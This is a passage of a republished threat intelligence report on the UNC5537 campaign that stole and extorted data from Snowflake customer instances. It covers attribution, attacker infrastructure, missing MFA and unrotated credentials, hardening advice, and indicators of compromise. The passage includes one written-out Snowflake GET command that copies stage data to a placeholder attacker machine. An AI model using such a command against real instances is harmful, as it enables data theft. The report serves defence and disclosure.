Today's Core Dump is brought to you by ThreatPerspective

Threat Intelligence

UNC5537 Targets Snowflake Customer Instances for Data Theft and Extortion


Finally, UNC5537 utilized the GET command to exfiltrate data from the temporary stages to locally specified directories.

GET @<target stage and filepath> file:///<Attacker Local Machine Path>;

UNC5537 Attribution

Mandiant has been tracking UNC5537, a financially motivated threat actor, as a distinct cluster since May 2024. UNC5537 has targeted hundreds of organizations worldwide, and frequently extorts victims for financial gain. UNC5537 operates under various aliases on Telegram channels and cybercrime forums. Mandiant has identified members having associations to other tracked groups. Mandiant assesses with moderate confidence that UNC5537 comprises members based in North America, and collaborates with an additional member in Turkey.

Attacker Infrastructure

UNC5537 primarily used Mullvad or Private Internet Access (PIA) VPN IP addresses to access victim Snowflake instances. When exfiltrating data, Mandiant observed the use of VPS systems from ALEXHOST SRL (AS200019), a Moldovan provider. UNC5537 was observed storing stolen victim data on several international VPS providers as well as the cloud storage provider MEGA.

Outlook & Implications

UNC5537’s campaign against Snowflake customer instances is not the result of any particularly novel or sophisticated tool, technique, or procedure. This campaign’s broad impact is the consequence of the growing infostealer marketplace and missed opportunities to further secure credentials:
  • UNC5537 was likely able to aggregate credentials for Snowflake victim instances by accessing a variety of different sources of infostealer logs. The underground infostealer economy is also extremely robust, and large lists of stolen credentials exist both for free and for purchase inside and outside of the dark web.
  • The affected customer instances did not require multi-factor authentication and in many cases, the credentials had not been rotated for as long as four years. Network allow lists were also not used to limit access to trusted locations.

This campaign highlights the consequences of vast amounts of credentials circulating on the infostealer marketplace and may be representative of a specific focus by threat actors on similar SaaS platforms. Mandiant assesses UNC5537 will continue this pattern of intrusion, targeting additional SaaS platforms in the near future.

The broad impact of this campaign underscores the urgent need for credential monitoring, the universal enforcement of MFA and secure authentication, limiting traffic to trusted locations for crown jewels, and alerting on abnormal access attempts. For further recommendations on how to harden Snowflake environments, please see Snowflake’s Hardening Guide.

Indicators of Compromise (IOCs)

Google Threat Intelligence Collection of IPs

A Google Threat Intelligence Collection of IPs is available.

Client Application IDS

  • Rapeflake
  • DBeaver_DBeaverUltimate
  • Go 1.1.5
  • JDBC 3.13.30
  • JDBC 3.15.0
  • PythonConnector 2.7.6
  • SnowSQL 1.2.32
  • Snowflake UI
  • Snowsight Al

Additional IOCs are available in Snowflake’s updated blog post.

Published: 2024-06-10T10:00:00

© Segmentation Fault . All rights reserved.

Privacy | Terms of Use | Contact Us